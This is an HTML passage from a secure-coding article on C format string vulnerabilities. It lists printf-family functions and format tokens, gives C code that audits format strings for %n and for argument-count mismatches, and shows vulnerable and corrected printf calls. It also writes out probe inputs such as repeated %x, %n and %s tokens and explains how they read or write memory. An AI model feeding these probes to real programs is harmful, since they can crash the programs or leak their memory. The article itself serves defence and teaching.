<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">BUG DETECTION ANALYSIS</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
There are several approaches to detecting the format string loophole, which is typically bound to the format family of functions. Format functions specify the format of output: they perform conversions so that C data types are rendered in printable form. Perhaps the most effective approach is rigorous code review, in which the programmer examines every place where format string specifiers are used. First, there is a list of functions in C/C++ that do not have a fixed list of arguments. Instead, they use the ANSI C standard mechanism for accessing arguments on the stack, regardless of how many arguments are actually presented.</div>
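As an added example (not code from the original article), the following C program combines the fix for FSA.CPP shown earlier, passing untrusted text as an argument rather than as the format, with a small format-string audit that a code reviewer or a wrapper around the printf family could apply: it counts argument-consuming conversions the way printf's parser does and flags %n, so a mismatch such as four %x tokens with zero arguments is caught before the call. The function and type names (audit_format, format_is_safe, echo_untrusted, struct fmt_audit) are hypothetical.

```c
/* Added example, not part of the original article. Names are hypothetical. */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Result of scanning a format string. */
struct fmt_audit {
    int conversions;     /* conversions that consume an argument from the stack */
    bool writes_memory;  /* true if a %n conversion is present */
    bool malformed;      /* true if a '%' is not followed by a valid conversion */
};

/* Scan fmt the way printf's parser would. "%%" is a literal percent and
 * consumes nothing; flags, width and precision are skipped, except that a
 * '*' width or precision consumes an argument of its own, exactly as
 * printf would pop one from the stack. */
struct fmt_audit audit_format(const char *fmt)
{
    struct fmt_audit a = {0, false, false};
    const char *p = fmt;
    while ((p = strchr(p, '%')) != NULL) {
        p++;
        if (*p == '%') { p++; continue; }            /* literal '%' */
        while (*p && strchr("-+ #0", *p)) p++;       /* flags */
        if (*p == '*') { a.conversions++; p++; }     /* width from argument */
        else while (*p >= '0' && *p <= '9') p++;     /* literal width */
        if (*p == '.') {                             /* precision */
            p++;
            if (*p == '*') { a.conversions++; p++; }
            else while (*p >= '0' && *p <= '9') p++;
        }
        while (*p && strchr("hlLqjzt", *p)) p++;     /* length modifiers */
        switch (*p) {
        case 'd': case 'i': case 'o': case 'u': case 'x': case 'X':
        case 'e': case 'E': case 'f': case 'F': case 'g': case 'G':
        case 'a': case 'A': case 'c': case 's': case 'p':
            a.conversions++;
            break;
        case 'n':                                    /* writes to memory */
            a.conversions++;
            a.writes_memory = true;
            break;
        default:                                     /* '%' at end, or unknown */
            a.malformed = true;
            return a;
        }
        p++;
    }
    return a;
}

/* Is fmt acceptable as the format for a call that supplies nargs arguments?
 * Rejects %n outright and any argument-count mismatch, the two conditions
 * the article shows being abused (memory writes and stack reads). */
bool format_is_safe(const char *fmt, int nargs)
{
    struct fmt_audit a = audit_format(fmt);
    return !a.malformed && !a.writes_memory && a.conversions == nargs;
}

/* The fix for FSA.CPP: untrusted text is an argument, never the format. */
void echo_untrusted(const char *text)
{
    printf("%s\n", text);
}

int main(int argc, char *argv[])
{
    if (argc != 2) {
        fputs("Enter the command argument\n", stderr);
        return 1;
    }
    /* Report what the user's string would have done as a format string,
     * then print it safely. */
    struct fmt_audit a = audit_format(argv[1]);
    printf("conversions=%d writes_memory=%d malformed=%d\n",
           a.conversions, a.writes_memory, a.malformed);
    echo_untrusted(argv[1]);
    return 0;
}
```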
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Table 1: </span>The printf() Family of Functions</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px 0px 0px 5pt; padding: 0px; vertical-align: baseline;">
<table border="0" style="border-collapse: collapse; border-spacing: 0px; border: 0px; box-sizing: border-box; font-family: inherit; font-size: 14px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 0px 1.4em; padding: 0px; vertical-align: baseline; width: 573px;"><colgroup style="box-sizing: border-box;"><col style="box-sizing: border-box; width: 124px;"></col><col style="box-sizing: border-box; width: 123px;"></col><col style="box-sizing: border-box; width: 123px;"></col><col style="box-sizing: border-box; width: 124px;"></col><col style="box-sizing: border-box; width: 123px;"></col></colgroup><tbody style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;" valign="top">
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border: 0.5pt solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Printf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: solid solid solid none; border-top-width: 0.5pt; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Fprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: solid solid solid none; border-top-width: 0.5pt; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Fwprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: solid solid solid none; border-top-width: 0.5pt; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Vprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: solid solid solid none; border-top-width: 0.5pt; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_cprintf</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Scanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Fscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Fwscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Vfprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_cscanf</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Wprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Vwprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Sscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Vfwprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_cwprintf</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Wscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Vwscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Swsscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Vsprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_cwscanf</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_sctprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_snprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_tprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_sntprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_ftscanf</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_scwprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_snscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_tscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_sntscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_scprintf</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_snwprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_snwscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_vstprint</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_vsnwprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_vftprintf</td></tr>
</tbody></table>
</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The preceding functions generate a string from a format string and a variable number of arguments. A format string can thus be thought of as a blueprint: it holds the fixed structure of the string plus tokens that determine what kind of variable data goes where and how it should be formatted by the <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> function.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Second, a number of format specifiers are available for the different types of argument that can be displayed by a <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> function; each of them can also carry additional modifiers and field-width definitions. The following table lists the ones most relevant to format string attacks:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Table 2: </span>Format Token</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px 0px 0px 5pt; padding: 0px; vertical-align: baseline;">
<table border="0" style="border-collapse: collapse; border-spacing: 0px; border: 0px; box-sizing: border-box; font-family: inherit; font-size: 14px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 0px 1.4em; padding: 0px; vertical-align: baseline; width: 573px;"><colgroup style="box-sizing: border-box;"><col style="box-sizing: border-box; width: 96px;"></col><col style="box-sizing: border-box; width: 315px;"></col><col style="box-sizing: border-box; width: 205px;"></col></colgroup><tbody style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;" valign="top">
<tr style="background: rgb(141, 179, 226); border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border: 0.5pt solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Token</span></td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: solid solid solid none; border-top-width: 0.5pt; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">To be Displayed</span></td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: solid solid solid none; border-top-width: 0.5pt; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Argument Category</span></td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">%x</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Value of the argument in hexadecimal notation as an unsigned integer</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">unsigned int, char/short</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">%d or %i</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Value of the argument in decimal notation as a signed integer</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">int, char/short</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">%s</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Character string pointed to by the argument</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">char *, char[]</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">%u</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Value of the argument in decimal notation as an unsigned integer</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">unsigned int, char/short</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">%p</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Value of the pointer argument in hexadecimal notation</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">void *</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">%n</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Nothing is displayed; the number of characters output so far is written to the int pointed to by the argument</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">int *</td></tr>
</tbody></table>
</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
If the program produces strange output when format-string input is supplied to it, it may be vulnerable to this attack. For instance, feeding a program sequences such as %x%x%x%x%x%x%x…, %n%n%n%n%n… or %s%s%s%s%s… may make it crash or output data from the stack.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">COUNTERMEASURE</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Once an attacker has detected this flaw and exploited it, they can perform several malicious operations: read memory from the target process using the %s specifier, write the number of characters output so far to an arbitrary address using the %n specifier, and control that character count using width modifiers.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
So, the rule of thumb for preventing exploitable format string bugs is never to pass a non-constant string as the format argument of any function in the <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> family. The correct usage of <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em>, with a constant format string, is as follows:</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">printf(user_supplied_data);                // Vulnerable: untrusted data becomes the format string
printf("%s", user_supplied_data);          // Correct: constant format, data passed as an argument
fprintf(stderr, user_supplied_data);       // Vulnerable: same problem with fprintf
fprintf(stderr, "%s", user_supplied_data); // Correct usage
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Besides, if circumstances truly demand that a format string include input read from outside the program, then rigorous input validation should be performed on any such value before it is included in the format string. Moreover, the code should be checked regularly with third-party tools such as Flawfinder, RATS and ITS4, which look for this vulnerability.</div>
